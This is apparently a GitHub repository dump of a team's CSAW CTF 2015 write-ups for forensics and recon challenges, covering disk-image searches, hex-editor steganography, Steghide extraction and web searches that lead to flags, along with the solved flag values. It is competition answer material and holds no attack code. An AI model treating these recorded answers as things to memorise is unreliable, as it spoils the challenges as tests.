Image](./Images/CTF42A.jpg)] 18 | 19 | So to reduce the scope of the search I change the search term to ```flag{``` and I am immediately taken to the flag for this CTF ```flag{b3l0w_th3_r4dar}``` 20 | ![CTF Image](./Images/CTF43A.jpg)] 21 | 22 | The flag recovered to solve this CTF is ```flag{b3l0w_th3_r4dar}``` 23 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF1.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF10.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF10.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF11.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF11.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF12.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF12.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF13.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF13.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF14.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF14.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF15.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF15.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF16.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF16.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF16A.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF16A.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF16B.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF16B.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF17.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF17.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF17A.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF17A.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF17B.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF17B.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF18.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF18.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF19.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF19.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF2.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF20.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF20.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF3.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF31.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF31.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF32.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF32.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF33.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF33.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF34.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF34.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF35.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF35.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF4.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF4.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF41.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF41.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF41A.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF41A.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF42.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF42.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF42A.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF42A.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF43.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF43.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF43A.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF43A.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF5.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF5.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF6.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF6.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF7.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF7.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF8.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF8.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Images/CTF9.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Flash/Images/CTF9.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Flash/Readme.md: -------------------------------------------------------------------------------- 1 | #Flash 2 | 3 | **Category:** Forensics 4 | **Points:** 100 5 | **Description:** 6 | 7 | We were able to grab an image of a harddrive. Find out what's on it. 8 | 9 | ##Write-up 10 | Based on the information provided it appears that we will be dealing with an [image](https://en.wikipedia.org/wiki/Disk_image) of a flash hard drive so I am expecting that I will be using forensic software to analyze the file. 11 | 12 | As there are several ways to perform this CTF we included three different write ups. 13 | 14 | [Flash Option 1](Flash option 1.md) 15 | This option provides a very high level approach using any commercial forensic software. 16 | 17 | [Flash Option 2](./Flash%20option%202.md) 18 | This option demonstrates how to use the Autopsy Forensic Browser with The Sleuth Kit running on the [SANS Investigative Forensic Toolkit] (http://digital-forensics.sans.org/community/downloads). 19 | 20 | [Flash Option 3](Flash%20option%203.md) 21 | This option demonstrates how to use The Sleuth Kit command 'srch_strings' running on the [SANS Investigative Forensic Toolkit] (http://digital-forensics.sans.org/community/downloads). 22 | 23 | [Flash Option 4](Flash%20option%204.md) 24 | This option demonstrates how to use a hex editor to find the flag. 25 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Keep-Calm-and-CTF/Images/CTF2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Keep-Calm-and-CTF/Images/CTF2.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Keep-Calm-and-CTF/Images/CTF3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Keep-Calm-and-CTF/Images/CTF3.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Keep-Calm-and-CTF/Images/img.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/Keep-Calm-and-CTF/Images/img.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/Keep-Calm-and-CTF/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | #Keep Calm and CTF 3 | 4 | **Category:** Forensics 5 | **Points:** 100 6 | **Description:** 7 | 8 | My friend sends me pictures before every ctf. He told me this one was special. 9 | Note: this flag doesn't follow the "flag{}" format 10 | 11 | ##Write-up 12 | Our first clues come from the actual description. The challenge identifies this file as a possible image file and states this image is special. This caused me to immediately start thinking this challenge would be related to steganography ([Steganography](https://en.wikipedia.org/wiki/Steganography) is the practice of concealing data within another file). The description also states that the flag does not follow the "flag{}" format so I will need to keep an open mind when searching for the flag and not focus on the word 'flag' per se. 13 | 14 | At first glance the file appears to be a normal image file. It displays properly in an image viewer and there are no error messages present when trying to open the file. 15 | 16 | ![CTF Image](./Images/img.jpg) 17 | 18 | In cases where I suspect steganography what I usually do is first is open the file with a hex editor to see if anything obviously jumps out at me as hidden data. 19 | 20 | 21 | So I open the file with [Hex Edit](http://www.hexedit.com) and take a quick look. 22 | ![CTF Image](./Images/CTF2.jpg)] 23 | 24 | Scrolling thru the file I can quickly see there appears to be a message hidden at the top of the file. 25 | 26 | ![CTF Image](./Images/CTF3.jpg)] 27 | 28 | Entering the value ```h1d1ng_in_4lm0st_pla1n_sigh7``` as the flag solves this challenge. 29 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/airport/Images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/airport/Images/1.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/airport/Images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/airport/Images/2.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/airport/Images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/airport/Images/3.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/airport/Images/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/airport/Images/4.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/airport/Images/steghide.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/airport/Images/steghide.jpg -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/airport/Readme.md: -------------------------------------------------------------------------------- 1 | #Airport 2 | 3 | **Category:** Forensics 4 | **Points:** 200 5 | **Description:** NA 6 | 7 | [airport_26321e6eac7a7490e527cbe27ceb68c1.zip](airport_26321e6eac7a7490e527cbe27ceb68c1.zip) 8 | 9 | ##Write-up 10 | We get our first clue from hitting the link in the description and retrieving the zip file. This file contains four .png and one .jpg file. The four png images are aerial views of various unknown airfields. The jpg image is a banner of the popular Steganography program called Steghide. After reviewing the Steghide documentation, it's clear the program only supports JPEG, BMP, WAV and AU files. This was the first clue that the hidden data was in the only jpg file contained in the zip file. 11 | 12 | The next step was to determine what airfields were depicted in four png images. Each airfield image contained at least one highway/road number in the embedded on the photo. This led to google searches in an attempt to identify all four airfields. e.g., airport highway 1 revealed Los Angeles International Airport (LAX) for image 3.png. 13 | 14 | ![Image of 3] 15 | (./Images/3.png) 16 | 17 | The hardest part of solving this challenge was 1.png. The airfield in questions indicates yellow road numbers. After massive google searches it was determined many European countries use these colors. However, no results were identified. Further review of the image showed a baseball diamond at the top of the image indicating that the airfield was likely not in Europe. Other countries that use the same color signs finally revealed Cuba (José Martí International Airport) as the answer. 18 | 19 | 20 | ![Image of 1] 21 | (./Images/1.png) 22 | 23 | Also identifed were Hong Kong International Airport 24 | ![Image of 2] 25 | (./Images/2.png) 26 | 27 | And Toronto Pearson International Airport 28 | ![Image of 4] 29 | (./Images/4.png) 30 | 31 | After all four airfields were identifed it was just a matter of determining their three letter international identifier. 32 | 33 | >```python 34 | HAV - José Martí International Airport 35 | HKG - Hong Kong International Airport 36 | LAX - Los Angeles International Airport 37 | YYZ - Toronto Pearson International Airport 38 | >``` 39 | 40 | We concatenated the airport codes together to create the passphrase ```HAVHKGLAXYYZ``` Using Steghide we used the ```--info``` option and the passphrase to detetermine if there was an embedded file in the image. 41 | 42 | >``` 43 | c:\steghide-0.5.1-win32\steghide>steghide.exe --info steghide.jpg 44 | "steghide.jpg": 45 | format: jpeg 46 | capacity: 167.0 Byte 47 | Try to get information about embedded data ? (y/n) y 48 | Enter passphrase:HAVHKGLAXYYZ 49 | embedded file "key.txt": 50 | size: 13.0 Byte 51 | encrypted: rijndael-128, cbc 52 | compressed: yes 53 | >``` 54 | 55 | Once confirmed, we extracted the file and obtained the flag in the form of the key.txt file. 56 | 57 | >``` 58 | c:\steghide-0.5.1-win32\steghide>steghide.exe extract -sf steghide.jpg 59 | Enter passphrase:HAVHKGLAXYYZ 60 | wrote extracted data to "key.txt". 61 | >``` 62 | 63 | Looking into the extracted key.txt file we get the flag ```iH4t3A1rp0rt5``` 64 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Forensics/airport/airport_26321e6eac7a7490e527cbe27ceb68c1.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Forensics/airport/airport_26321e6eac7a7490e527cbe27ceb68c1.zip -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Alexander-Taylor/Images/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Alexander-Taylor/Images/1.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Alexander-Taylor/Images/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Alexander-Taylor/Images/2.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Alexander-Taylor/Images/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Alexander-Taylor/Images/3.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Alexander-Taylor/Images/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Alexander-Taylor/Images/4.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Alexander-Taylor/Images/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Alexander-Taylor/Images/5.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Alexander-Taylor/Images/decode.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Alexander-Taylor/Images/decode.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Alexander-Taylor/Images/enigma.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Alexander-Taylor/Images/enigma.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Alexander-Taylor/Images/js.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Alexander-Taylor/Images/js.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Alexander-Taylor/Images/linkedin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Alexander-Taylor/Images/linkedin.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Alexander-Taylor/Images/wcsc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Alexander-Taylor/Images/wcsc.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Alexander-Taylor/Images/yoshi_forum.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Alexander-Taylor/Images/yoshi_forum.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Alexander-Taylor/Images/yoshi_text.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Alexander-Taylor/Images/yoshi_text.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Alexander-Taylor/Readme.md: -------------------------------------------------------------------------------- 1 | #Alexander Taylor 2 | 3 | **Category:** Recon 4 | **Points:** 100 5 | **Description:** 6 | 7 | http://fuzyll.com/csaw2015/start 8 | 9 | ##Write-up 10 | We get our first clue from hitting the link in the description. 11 | 12 | ![Image of 1] 13 | (./Images/1.png) 14 | 15 | We are left with an unkown numbers of steps, but at least we have somewhere to start. Off to google. Using both the his name and domain name for searches on linkedin we find the following. 16 | 17 | ![Image of linkedin] 18 | (./Images/linkedin.png) 19 | 20 | Another quick google for USF's hacking club leads us to: 21 | 22 | ![Image of wscs] 23 | (./Images/wcsc.png) 24 | 25 | Trying the acronym leads us to step 2. 26 | 27 | ![Image of 2] 28 | (./Images/2.png) 29 | 30 | Here we are given a base64 encoded message. Decoding gives us our next clue. 31 | 32 | ![Image of decode] 33 | (./Images/decode.png) 34 | 35 | Back to google we go. Using ```fuzyll``` and ```Super Smash Brothers``` we find a hit on ```smashboards.com```. 36 | 37 | ![Image of forum] 38 | (./Images/yoshi_forum.png) 39 | 40 | The profile name is ```fuzyll``` and with all of the postings regarding ```yoshi``` I believe we have our character. 41 | 42 | ![Image of 3] 43 | (./Images/3.png) 44 | 45 | This one took a touch longer than the others, but any forensic activity on the image will reveal our next clue. 46 | 47 | ![Image of text] 48 | (./Images/yoshi_text.png) 49 | 50 | This one took the longest by far. A quick look back at his LinkedIn profile reveals that he has placed in the DEFCON finals for DEFCON 19, 20, 21, and 22. I started my search on DEFCON 17 and 18 figuring he didn't make it to the finals on his first attempt. A lot of searching led me here: 51 | 52 | ![Image of enigma] 53 | (./Images/enigma.png) 54 | 55 | After many other tries, we finally hit ```enigma``` which in turn gives us: 56 | 57 | ![Image of 4] 58 | (./Images/4.png) 59 | 60 | This was another easy step. We can use the developer tools to quickly run the javascript with the given string. 61 | 62 | ![Image of js] 63 | (./Images/js.png) 64 | 65 | Doing so gives us the final path and in turn, the flag. 66 | 67 | ![Image of 5] 68 | (./Images/5.png) 69 | 70 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Eric-Liang/Images/CSAW.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Eric-Liang/Images/CSAW.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Eric-Liang/Images/brooklyn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Eric-Liang/Images/brooklyn.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Eric-Liang/Images/competitors.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Eric-Liang/Images/competitors.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Eric-Liang/Images/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Eric-Liang/Images/flag.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Eric-Liang/Images/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Eric-Liang/Images/logo.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Eric-Liang/Images/team_website.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Eric-Liang/Images/team_website.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Eric-Liang/Images/teams.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Eric-Liang/Images/teams.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Eric-Liang/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | #Eric Liang 3 | 4 | **Category:** Recon 5 | **Points:** 100 6 | **Description:** Eric played ctfs with some friends a while ago 7 | 8 | 9 | ##Write-up 10 | This 100 point challenge was to find a flag related to Eric Liang and CTFs in which he participated in the past with some friends. The first thing we set out to do was find out more information on Eric to determine where we should be looking. We started with some background information on him from Facebook and found this post on the CSAW page: 11 | 12 | ![Image of 1] 13 | (./Images/CSAW.png) 14 | 15 | Our thinking now was to search the CSAW archives for the past 2 years for teams on which he may have participated. And here came the first of many frustrations for this challenge: There were hundreds of teams to search through and no team member listing! We looked through the list one at a time then decided to narrow the list to just the NYU teams and look up members on CTFTime.org. We got discouraged after looking up several teams and seeing no member listing. We moved on to the 2014 archive – this proved to be the first of many wrong turns we took on this challenge. 16 | 17 | ![Image of 2] 18 | (./Images/teams.png) 19 | 20 | The team members aren’t listed, again, but we went through the list to look for anything that would stick out, or maybe the flag? No, but we did find a team - BrooklynT Overflow - that was listed as a NYU team, that was also on the 2013 listing. 21 | 22 | ![Image of 3] 23 | (./Images/brooklyn.png) 24 | 25 | We looked this team up on CTFTime.org to see if it had a member listing or something more productive. Although Eric is clearly listed as a member of this team we didn’t find the flag just yet. We examined the image they had associated to the team, but that turned up nothing. 26 | 27 | ![Image of 4] 28 | (./Images/logo.png) 29 | 30 | We tracked down most of the solutions they posted for the past 2 years on the CTFs they participated in and the write-ups they posted for the flag. This got us nowhere. We decided to look into the team’s website.Again, we spent a lot of time examining this site - [http://www.isis.poly.edu/brooklynt-overflow ](http://www.isis.poly.edu/brooklynt-overflow) - for hidden flags. The hours we spent looking at everything on this site were – to put it kindly – regrettable. Every link was followed up and the source code to each page was examined. At this point we started looking into alternatives : maybe CTF in this case was a reference to on line gaming. We found out Eric was on the Poly Gaming Network club, so we went onto Steam and looked up event records for the past 2 years associated to PGN and Eric. I won’t say how much time we wasted here, but it was getting ugly. 31 | We decided to start over and re-examine the archive for 2013 and 2014. Under the Quals menu we located the Competitors listing. 32 | 33 | ![Image of 5] 34 | (./Images/competitors.png) 35 | 36 | We searched again for more NYU teams to track down. We started making a list of all the other NYU teams to follow up on when we came across the flag in plain sight! We had been here hours before, but didn’t make it this far down the list? Maybe we were in the wrong year? I don’t know for sure why we didn’t see this originally, I may never forgive myself for not seeing it on the first visit. Eric is real!! 37 | 38 | ![Image of 6] 39 | (./Images/flag.png) 40 | 41 | 42 | 43 | -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Julian-Cohen/Images/google.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Alpackers/CTF-Writeups/9db67e323506559d6df8ff2d9e6701cb32348378/2015/CSAW-CTF/Recon/Julian-Cohen/Images/google.png -------------------------------------------------------------------------------- /2015/CSAW-CTF/Recon/Julian-Cohen/Readme.md: -------------------------------------------------------------------------------- 1 | #Julian Cohen 2 | 3 | **Category:** Recon 4 | **Points:** 100 5 | **Description:** 6 | 7 | N/A 8 | 9 | ##Write-up 10 | This is as easy as it gets. Google it. 11 | 12 | ![Image of google] 13 | (./Images/google.png) 14 | 15 | In case you missed it the flag shows up on the 1st results page within the ```@HockeyInJune``` Twitter 